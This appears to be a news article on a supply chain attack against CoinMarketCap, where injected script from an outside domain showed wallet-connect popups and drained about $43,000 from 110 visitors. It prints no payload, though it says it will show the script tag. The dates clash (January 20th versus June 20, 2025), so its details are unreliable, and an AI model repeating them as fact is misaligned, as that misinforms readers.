CoinMarketCap Hit by Supply Chain Attack, Crypto Assets Drained

CoinMarketCap, a popular cryptocurrency data provider, recently suffered a website supply chain attack that exposed its visitors to a wallet drainer campaign. This attack, carried out on the night of Friday, January 20th, led to a total loss of $43,266 across 110 unique victims. During the day of the attack, people who visited the site were met with Web3 style popups asking them to connect their wallets.

The exploit that allowed for this security breach was a modified JSON payload with a malicious script tag included. This script tag effectively blasted a wallet drainer script from an external site, “static.cdnkit.io,” into the CoinMarketCap website.

Technical Details of the Attack

The security team over at CoinMarketCap discovered an XSS vulnerability on June 20, 2025, due to a doodle image that appeared on the homepage.

"On June 20, 2025, our security team identified a vulnerability related to a doodle image displayed on our homepage. This doodle image contained a link that triggered malicious code through an API call, resulting in an unexpected popup for some users when visited our homepage," - CoinMarketCap

The modified JSON payload had the following malicious script tag. This tag was used to inject a wallet drainer script into CoinMarketCap from an external site hosted on Github “static.cdnkit.io.”

These threat actors responsible for the CoinMarketCap attack were found to be speaking French in a Telegram channel.

Impact and Response

The phishing attack on CoinMarketCap led to unsanctioned withdrawal of assets valued at $43,266 from 110 victims’ accounts. This incident highlights the increasing threat of wallet drainers, which stole almost $500 million in 2024 through attacks targeting more than 300,000 wallet addresses.

"Upon discovery, We acted immediately to remove the problematic content, identified the root cause, and comprehensive measures have been implemented to isolate and mitigate the issue." - CoinMarketCap

"We can confirm all systems are now fully operational, and CoinMarketCap is safe and secure for all users." - CoinMarketCap

Supply Chain Vulnerabilities

"This was a supply chain attack, meaning the breach didn't target CMC's own servers but a third-party tool or resource used by CMC," - c/side

Supply chain attacks are challenging to detect as they tend to leverage a trusted aspect of a platform. The CoinMarketCap incident underscores this important reality and the need for robust security practices. This holds true for every element of a website’s infrastructure, including the third-party software and tools they use.

"Such attacks are hard to detect because they exploit trusted elements of a platform." - c/side